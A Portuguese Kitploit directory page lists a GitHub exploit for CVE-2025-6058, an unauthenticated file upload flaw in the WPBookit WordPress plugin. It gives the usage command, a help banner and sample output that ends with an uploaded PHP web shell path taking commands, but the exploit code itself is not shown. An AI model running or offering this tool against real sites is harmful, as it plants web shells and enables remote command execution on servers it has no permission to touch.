Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/nxploited/cve-2025-6058
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-6058

CVE-2025-6058

WPBookit <= 1.0.4 - Upload Arbitrário de Arquivo Não Autenticado

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

⚡ WPBookit <= 1.0.4 - Upload de Arquivo Arbitrário Não Autenticado


📝 Descrição

O plugin WPBookit para WordPress é vulnerável a uploads arbitrários de arquivos devido à falta de validação do tipo de arquivo na função image_upload_handle(), que é vinculada através da rota add_booking_type em todas as versões até, e incluindo, 1.0.4.
Esta falha permite que atacantes não autenticados façam upload de arquivos arbitrários no servidor do site afetado, potencialmente levando à execução remota de código.

CVECVSS ScoreDivulgado PublicamenteÚltima Atualização
CVE-2025-60589.8 (Crítico)11 de Julho de 202512 de Julho de 2025

🚀 O que este exploit faz?

Este exploit automatiza o processo de:

  • Detectar se o alvo está executando uma versão vulnerável do WPBookit (<= 1.0.4)
  • Fazer upload de um shell PHP usando a rota vulnerável, sem autenticação
  • Confirmar o upload do shell e fornecer seu caminho exato para execução remota de comandos

🛠️ Uso

root@kitploit:~
python3 CVE-2025-6058.py -u http://target.com/wordpress

🖥️ Exemplo

root@kitploit:~
python3 CVE-2025-6058.py -u http://target.com/wordpress

🆘 Ajuda & Exemplo de Banner

root@kitploit:~
python CVE-2025-6058.py -help

  ______   __     __  ________       ______    ______    ______   _______            ______    ______   _______    ______  
 /      \ /  |   /  |/        |     /      \  /      \  /      \ /       |          /      \  /      \ /       |  /      \ 
/$$$$$$  |$$ |   $$ |$$$$$$$$/     /$$$$$$  |/$$$$$$  |/$$$$$$  |$$$$$$$/          /$$$$$$  |/$$$$$$  |$$$$$$$/  /$$$$$$  |
$$ |  $$/ $$ |   $$ |$$ |__  ______$$____$$ |$$$  \$$ |$$____$$ |$$ |____   ______ $$ \__$$/ $$$  \$$ |$$ |____  $$ \__$$ |
$$ |      $$  \ /$$/ $$    |/      |/    $$/ $$$$  $$ | /    $$/ $$      \ /      |$$      \ $$$$  $$ |$$      \ $$    $$< 
$$ |   __  $$  /$$/  $$$$$/ $$$$$$//$$$$$$/  $$ $$ $$ |/$$$$$$/  $$$$$$$  |$$$$$$/ $$$$$$$  |$$ $$ $$ |$$$$$$$  | $$$$$$  |
$$ \__/  |  $$ $$/   $$ |_____     $$ |_____ $$ \$$$$ |$$ |_____ /  \__$$ |        $$ \__$$ |$$ \$$$$ |/  \__$$ |$$ \__$$ |
$$    $$/    $$$/    $$       |    $$       |$$   $$$/ $$       |$$    $$/         $$    $$/ $$   $$$/ $$    $$/ $$    $$/ 
 $$$$$$/      $/     $$$$$$$$/     $$$$$$$$/  $$$$$$/  $$$$$$$$/  $$$$$$/           $$$$$$/   $$$$$$/   $$$$$$/   $$$$$$/  
                                                                                                                           
                                                                                                                           
                                                                                                                           

Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited

usage: CVE-2025-6058.py [-h] -u URL

CVE-2025-6058 WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)

options:
  -h, --help     mostrar esta mensagem de ajuda e sair
  -u, --url URL  URL alvo ex: http(s)://target.com/wordpress

📤 Saída

root@kitploit:~
[*] Verificando versão do plugin ...
[*] Explorando upload de arquivo ...
[+] Exploração bem-sucedida!
[+] Shell path: wp-content/uploads/2025/07/shell.php?cmd=whoami
Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited

⚠️ Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizado.
O autor não é responsável por qualquer uso indevido ou atividade não autorizada.
Use por sua conta e risco e sempre certifique-se de ter permissão para testar o sistema alvo.


Por: Khaled Alenazi (Nxploited)

Baixar ferramenta